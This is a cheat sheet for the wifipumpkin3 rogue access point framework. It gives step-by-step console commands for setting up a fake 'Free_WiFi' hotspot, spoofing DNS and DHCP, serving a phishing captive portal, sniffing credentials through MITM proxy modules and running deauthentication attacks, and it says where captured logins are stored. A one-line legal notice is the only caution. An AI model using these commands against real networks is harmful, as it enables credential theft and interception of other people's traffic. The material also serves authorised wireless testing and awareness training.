Wifipumpkin3 Cheat Sheet
wifipumpkin3 is a modern rogue access point framework used for wireless MITM, traffic interception, and phishing attacks. It integrates DHCP, DNS spoofing, captive portals, and proxy modules.
Start Wifipumpkin3
sudo wifipumpkin3
Create a Rogue AP
wp3 > set interface wlan0
wp3 > set ssid Free_WiFi
wp3 > set channel 6
wp3 > start
Enable DHCP & DNS Spoofing
wp3 > use dhcp
wp3 > use dns
Captive Portal (Phishing)
List portals:
wp3 > portals
Enable portal:
wp3 > set portal login
MITM Modules
Common modules: - HTTP proxy - HTTPS strip (where applicable) - DNS spoof - Credential sniffer
Enable module:
wp3 > use proxy
Deauthentication Attack
wp3 > use deauth
wp3 > set target AP_MAC
wp3 > start
Monitor Captured Data
Logs location:
~/.config/wifipumpkin3/logs/
Captured: - Credentials - HTTP requests - DNS queries
Stop Attack
wp3 > stop
wp3 > exit
Typical Workflow
Start wifipumpkin3
Create rogue AP
Enable DHCP/DNS
Enable captive portal
Monitor credentials
Common Issues
Clients not redirected
- HTTPS HSTS enabled
- DNS spoof blocked
Interface busy
- NetworkManager not stopped
Related Tools
wifiphisherbettercapairbase-ngbeEF
Use Cases
- Wireless MITM
- Rogue AP attacks
- Security awareness training
- Red team operations
Legal Notice
Danger
Use Wifipumpkin3 only on networks you own or have explicit permission to test.